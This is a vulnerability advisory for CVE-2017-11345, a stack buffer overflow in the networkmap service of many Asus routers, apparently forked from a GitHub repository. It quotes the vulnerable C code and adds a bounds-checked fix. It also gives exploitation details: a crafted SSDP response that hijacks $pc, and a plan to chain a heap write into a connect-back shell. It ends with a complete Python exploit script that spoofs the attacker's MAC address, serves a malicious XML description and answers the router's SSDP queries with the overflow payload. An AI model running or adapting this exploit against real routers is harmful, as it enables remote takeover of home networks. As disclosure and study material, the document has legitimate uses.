forked from coincoin7/Wireless-Router-Vulnerability
Asus_serviceTypeCopyOverflow.txt
CVE-2017-11345
[Vulnerability]:
Stack buffer overflow in networkmap
------------------------------------------
[Exploitation]:
Control of $pc.
Together with the global buffer overflow vulnerability referenced above, this allows
remote code execution and a connect-back shell.
------------------------------------------
[Vendor of Product]:
Asus wireless router
------------------------------------------
[Affected Products and firmware version]:
Asuswrt-Merlin, all firmware versions; the latest is 380.66_6
RT-AC5300, all firmware versions; the latest is 3.0.0.4.380.7743
RT_AC1900P, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC68U, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC68P, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC88U, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC66U, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC66U_B1, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC58U, all firmware versions; the latest is 3.0.0.4.380.7485
RT-AC56U, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC55U, all firmware versions; the latest is 3.0.0.4.380.7378
RT-AC52U, all firmware versions; the latest is 3.0.0.4.380.4180
RT-AC51U, all firmware versions; the latest is 3.0.0.4.380.7378
RT-N18U, all firmware versions; the latest is 3.0.0.4.380.7743
RT-N66U, all firmware versions; the latest is 3.0.0.4.380.7378
RT-N56U, all firmware versions; the latest is 3.0.0.4.378.7177
RT-AC3200, all firmware versions; the latest is 3.0.0.4.380.7743
RT-AC3100, all firmware versions; the latest is 3.0.0.4.380.7743
RT_AC1200GU, all firmware versions; the latest is 3.0.0.4.380.5577
RT_AC1200G, all firmware versions; the latest is 3.0.0.4.380.3167
RT-AC1200, all firmware versions; the latest is 3.0.0.4.380.9880
RT-AC53, all firmware versions; the latest is 3.0.0.4.380.9883
RT-N12HP, all firmware versions; the latest is 3.0.0.4.380.2943
RT-N12HP_B1, all firmware versions; the latest is 3.0.0.4.380.3479
RT-N12D1, all firmware versions; the latest is 3.0.0.4.380.7378
RT-N12+, all firmware versions; the latest is 3.0.0.4.380.7378
RT_N12+_PRO, all firmware versions; the latest is 3.0.0.4.380.9880
RT-N16, all firmware versions; the latest is 3.0.0.4.380.7378
RT-N300, all firmware versions; the latest is 3.0.0.4.380.7378
------------------------------------------
[Attack Type]:
Remote
------------------------------------------
[Can Cause Denial of Service?]:
yes
------------------------------------------
[Reference]:
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/networkmap/function.c#L903-L1032
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (the firmware source code for the other models can be downloaded from their corresponding pages)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
[Discoverer]:
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
[Affected components]:
Affected executable application: networkmap
Affected source code file: \release\src\router\networkmap\function.c
Affected function: store_description(char *msg)
------------------------------------------
[Vulnerability details]:
When the networkmap function process_device_response parses the SSDP answer
from a device and the answer indicates a location, for example:
HTTP/1.1 200 OK
Location:HTTP://host:port/path
and "HTTP://host:port/path" is valid, networkmap fetches the device description
XML from "HTTP://host:port/path" and uses the function store_description
to store the device description information in the global struct device_info.
In switch case 6 of the function store_description:
    case 6: // tmp="urn:schemas-upnp-org:service:serviceType:v"
        mxend = tmp;
        i = 0; j = 0;
        while(i != 4)
        {
            if(i == 3)
                tmp[j++] = *mxend;
            if(*mxend == ':')
                i++;
            mxend++;
        }
        tmp[j-1] = '\0';
        strlcpy(description.service[s_num].name, tmp, sizeof(description.service[s_num].name));
        NMP_DEBUG_F("service %d name = %s\n", s_num, tmp);
        break;
if the fourth ':' is not found in tmp, the loop keeps walking beyond the end of the
buffer and the stack buffer tmp is overflowed; this stack-based overflow can be used to
gain control over networkmap's control flow by overwriting the saved $ra stored on the stack.
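As an added illustration (not code from networkmap or from this advisory), the same fourth-colon extraction written with explicit bounds: the scan never leaves the input buffer, a missing separator is reported instead of falling through, and the copy is length-checked. The function name and signature are my own.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hardened replacement for the "case 6" scan described above (added
 * example, not networkmap's own code). The original walks the buffer
 * until it has seen four ':' characters with no bound on how far it
 * reads or writes. This version scans only within in_len bytes of the
 * input, stops at the NUL, and copies the fourth colon-delimited field
 * (the service name) into out with an explicit length check.
 *
 * Returns the length of the extracted name, or -1 if the input does not
 * contain four ':' separators within bounds or the name does not fit.
 */
int extract_service_name(const char *in, size_t in_len,
                         char *out, size_t out_len)
{
    size_t pos = 0;
    int colons = 0;
    size_t start = 0, end = 0;

    if (in == NULL || out == NULL || out_len == 0)
        return -1;

    /* Locate the 3rd and 4th ':' without leaving [0, in_len). */
    while (pos < in_len && in[pos] != '\0') {
        if (in[pos] == ':') {
            colons++;
            if (colons == 3)
                start = pos + 1;          /* name begins after 3rd ':' */
            if (colons == 4) {
                end = pos;                /* name ends before 4th ':' */
                break;
            }
        }
        pos++;
    }
    if (colons < 4)
        return -1;                        /* malformed: refuse, do not scan on */

    size_t name_len = end - start;
    if (name_len >= out_len)
        return -1;                        /* would not fit, refuse */

    memcpy(out, in + start, name_len);
    out[name_len] = '\0';
    return (int)name_len;
}
```

On the advisory's input "<serviceType>AAAA<>" the function returns -1 where the original loop would have run off the end of tmp.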
------------------------------------------
[Exploitation details]:
When answering the SSDP request, an SSDP answer message like the following can be sent:
'HTTP/1.1 200 OK\r\nLocation:HTTP://192.168.2.31:1337/' + 'B'*231 + b'\x41\x41\x41:' + '\r\n\r\n'
When networkmap then fetches the device description XML from "HTTP://192.168.2.31:1337/",
a device description XML like the following can be returned:
<?xml><serviceType>AAAA<></root>
After the code in case 6 runs, the stack buffer tmp is overflowed, the data starting at
tmp becomes 'B'*231 + b'\x41\x41\x41', and the saved $ra, and hence $pc, is set to 0x00414141.
$pc is therefore controlled by overwriting the saved $ra stored on the stack.
For further exploitation, to get a connect-back shell, the "write data at any address
in heap" vulnerability, which is also in the function store_description, can be used
to write the connect-back shellcode at a fixed heap address; this code-execution
vulnerability then sets $pc to the address of that shellcode.
------------------------------------------
[exp.py]:
# coding=utf-8
# Tested product and firmware version:
# RT-N12HP_B1 (3.0.0.4.380.3479)
import time
import socket
import sys
import os
import threading
import socketserver

ROUTER_IP = '192.168.2.1'  # asus wireless router ip
IP = '192.168.2.31'        # attacker ip
INTERFACE = 'eth0'         # attacker host network interface

# device description xml returned to networkmap (bytes, as socket.send requires)
sc = b'<?xml>'
sc += b'<serviceType>'
sc += b'AAAA' * 49
sc += b'AA<></root>'

def mac():
    os.system('macchanger -A {}'.format(INTERFACE))
    os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {};'.format(INTERFACE, INTERFACE, IP, ROUTER_IP))

class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
    def handle(self):
        print('[-] got xml request')
        self.request.recv(1024)
        print("[-] sending xml")
        self.request.send(sc)

class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass

socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
t = threading.Thread(target=server.serve_forever)
t.start()
print("[-] Please open a new terminal and ping ROUTER_IP to speed up SSDP network interaction")

# join the SSDP multicast group and wait for the router's M-SEARCH
addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('239.255.255.250', 1900))
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(addrinfo[4][0]) + socket.inet_aton('0.0.0.0'))
mac()
times = 0
state = 'Overflow'
while True:
    data, sender = s.recvfrom(1500)
    if sender[0] == ROUTER_IP and sender[1] == 1008:
        print("[-] received SSDP M-SEARCH Package")
        data = {}
        data['Overflow'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode() + b':1337/' + b'B' * 231 + b'\xe0\xbb\x41:' + b'\r\n\r\n'
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(data[state], sender)
        if state == 'Overflow':
            print("[-] Send the GetXmlRequest to router")
            time.sleep(20)
            os._exit(0)